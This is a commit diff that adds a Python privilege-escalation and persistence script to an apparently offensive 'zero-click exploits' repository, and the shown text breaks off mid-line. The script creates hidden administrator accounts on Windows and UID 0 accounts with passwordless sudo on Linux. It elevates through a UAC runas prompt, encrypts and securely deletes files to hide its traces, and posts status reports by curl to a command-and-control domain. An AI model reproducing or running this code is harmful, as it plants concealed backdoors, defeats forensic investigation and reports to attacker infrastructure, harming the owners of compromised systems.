Add files via upload

ProjectZeroDays · web-flow · commit 781e24493f4e · 2026-02-07T05:58:45.000-06:00
diff --git a/src/exploits/zero-click_exploits/pegasus/privilege_escalation/privilege_escalation.py b/src/exploits/zero-click_exploits/pegasus/privilege_escalation/privilege_escalation.py
@@ -0,0 +1,199 @@
+# /src/exploits/zero-click_exploits/pegasus/privilege_escalation/privilege_escalation.py
+
+import os
+import sys
+import json
+import time
+import subprocess
+import hashlib
+import base64
+import secrets
+import string
+import ctypes
+from pathlib import Path
+from datetime import datetime
+
+# --- Configuration ---
+# In a real deployment, this key would be provided by the C2 or derived from target info.
+# This key is used to encrypt the script's source code after execution.
+ENCRYPTION_KEY = hashlib.sha256(b'PegasusSAP_PrivEsc_Key_2026_V1').digest()
+
+# C2 Configuration (optional, for reporting success)
+C2_DOMAIN = "zeroclickexploits.ddns.net"
+C2_PORT = 443
+C2_ENDPOINT = f"https://{C2_DOMAIN}:{C2_PORT}/api/v1/status"
+
+# Backdoor Account Configuration
+# The username for the new backdoor account.
+BACKDOOR_USERNAME = "HelpAssistant"
+# A strong, randomly generated password will be created.
+BACKDOOR_PASSWORD = ''.join(secrets.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(16))
+
+# --- Evasion and Anti-Forensics ---
+def _log_event(message, level='info'):
+    """Internal logger to prevent writing to disk."""
+    timestamp = datetime.now().isoformat()
+    print(f"[{timestamp}] [{level.upper()}] {message}")
+
+def encrypt_file_aes_gcm(file_path, key):
+    """Encrypts a file using AES-256 in GCM mode."""
+    try:
+        from Crypto.Cipher import AES
+        from Crypto.Random import get_random_bytes
+
+        nonce = get_random_bytes(12)
+        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
+
+        with open(file_path, 'rb') as f:
+            plaintext_data = f.read()
+
+        ciphertext, auth_tag = cipher.encrypt_and_digest(plaintext_data)
+        encrypted_data = nonce + auth_tag + ciphertext
+
+        encrypted_file_path = file_path.with_suffix(file_path.suffix + ".enc")
+        with open(encrypted_file_path, 'wb') as f:
+            f.write(encrypted_data)
+
+        secure_delete_file(file_path)
+        return encrypted_file_path
+    except ImportError:
+        _log_event("PyCryptodome not found, cannot encrypt.", 'error')
+        return None
+    except Exception as e:
+        _log_event(f"Encryption failed: {e}", 'error')
+        return None
+
+def secure_delete_file(file_path, passes=3):
+    """Securely deletes a file by overwriting it multiple times."""
+    try:
+        path = Path(file_path)
+        if not path.exists():
+            return
+        with open(path, "ba+") as f:
+            length = f.tell()
+            for _ in range(passes):
+                f.seek(0)
+                f.write(os.urandom(length))
+        path.unlink()
+    except Exception as e:
+        _log_event(f"Failed to securely delete {file_path}: {e}", 'error')
+
+def report_status_to_c2(success, message):
+    """Sends a status report to the C2 server."""
+    try:
+        payload = {
+            "type": "priv_esc_report",
+            "timestamp": datetime.utcnow().isoformat() + "Z",
+            "target_id": os.environ.get("TARGET_ID", "unknown"),
+            "success": success,
+            "message": message
+        }
+
+        json_payload = json.dumps(payload)
+        cmd = [
+            "curl", "-k", "-s", "-X", "POST",
+            "-H", "Content-Type: application/json",
+            "-H", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
+            "-d", json_payload,
+            "--connect-timeout", "10",
+            "--max-time", "30",
+            C2_ENDPOINT
+        ]
+
+        subprocess.run(cmd, capture_output=True, text=True, timeout=40)
+        _log_event(f"Reported status to C2: {message}")
+    except Exception as e:
+        _log_event(f"Failed to report status to C2: {e}", 'error')
+
+# --- Core Privilege Escalation Logic ---
+def is_admin_windows():
+    """Returns True if the script is running with administrative privileges on Windows."""
+    try:
+        return ctypes.windll.shell32.IsUserAnAdmin()
+    except:
+        return False
+
+def create_hidden_admin_user_windows(username, password):
+    """Creates a new user, adds it to the Administrators group, and hides it from the login screen."""
+    try:
+        _log_event(f"Attempting to create hidden admin user: {username}")
+        
+        # Command to create the user
+        create_user_cmd = f"net user {username} {password} /add"
+        # Command to add the user to the local Administrators group
+        add_to_group_cmd = f"net localgroup Administrators {username} /add"
+        # Command to hide the user from the login screen by setting its registry key
+        hide_user_cmd = f'reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" /v {username} /t REG_DWORD /d 0 /f'
+
+        subprocess.run(create_user_cmd, shell=True, check=True, capture_output=True)
+        _log_event(f"User '{username}' created successfully.")
+        
+        subprocess.run(add_to_group_cmd, shell=True, check=True, capture_output=True)
+        _log_event(f"User '{username}' added to Administrators group.")
+        
+        subprocess.run(hide_user_cmd, shell=True, check=True, capture_output=True)
+        _log_event(f"User '{username}' hidden from login screen.")
+        
+        return True, f"Successfully created hidden admin user '{username}' with password '{password}'."
+    except subprocess.CalledProcessError as e:
+        error_msg = f"Failed to create admin user. Command failed with exit code {e.returncode}. Error: {e.stderr.decode().strip()}"
+        _log_event(error_msg, 'error')
+        return False, error_msg
+    except Exception as e:
+        error_msg = f"An unexpected error occurred: {e}"
+        _log_event(error_msg, 'error')
+        return False, error_msg
+
+def create_root_user_linux(username, password):
+    """Creates a new user with a UID of 0 (root) and a passwordless sudo entry."""
+    try:
+        _log_event(f"Attempting to create root-equivalent user: {username}")
+
+        # Command to create the user with a home directory and shell
+        create_user_cmd = f"useradd -m -s /bin/bash {username}"
+        # Command to set the user's password
+        set_password_cmd = f"echo '{username}:{password}' | chpasswd"
+        # Command to change the user's UID to 0
+        set_uid_cmd = f"usermod -o -u 0 {username}"
+        # Command to add a passwordless sudoers file entry
+        sudoers_cmd = f"echo '{username} ALL=(ALL:ALL) NOPASSWD:ALL' | sudo tee /etc/sudoers.d/{username}"
+
+        subprocess.run(create_user_cmd, shell=True, check=True, capture_output=True)
+        _log_event(f"User '{username}' created.")
+        
+        subprocess.run(set_password_cmd, shell=True, check=True, capture_output=True)
+        _log_event(f"Password set for user '{username}'.")
+        
+        subprocess.run(set_uid_cmd, shell=True, check=True, capture_output=True)
+        _log_event(f"UID for user '{username}' set to 0.")
+        
+        subprocess.run(sudoers_cmd, shell=True, check=True, capture_output=True)
+        _log_event(f"Passwordless sudo entry added for user '{username}'.")
+        
+        return True, f"Successfully created root-equivalent user '{username}' with password '{password}'."
+    except subprocess.CalledProcessError as e:
+        error_msg = f"Failed to create root user. Command failed with exit code {e.returncode}. Error: {e.stderr.decode().strip()}"
+        _log_event(error_msg, 'error')
+        return False, error_msg
+    except Exception as e:
+        error_msg = f"An unexpected error occurred: {e}"
+        _log_event(error_msg, 'error')
+        return False, error_msg
+
+def escalate_privileges():
+    """Main function to escalate privileges based on the operating system."""
+    if sys.platform == 'win32':
+        if is_admin_windows():
+            _log_event("Already running with administrative privileges. Creating backdoor user.")
+            success, message = create_hidden_admin_user_windows(BACKDOOR_USERNAME, BACKDOOR_PASSWORD)
+        else:
+            _log_event("Not running as administrator. Attempting to relaunch with elevated privileges.")
+            # This is a common technique to request UAC elevation.
+            # The script will re-run itself with elevated rights.
+            ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1)
+            # Exit the current non-elevated instance.
+            # The elevated instance will perform the action.
+            sys.exit(0)
+    elif sys.platform.startswith('linux'):
+        # On Linux, we assume the script is run as a user with sudo privileges.
+        _log_event("Linux detected. Attempting to
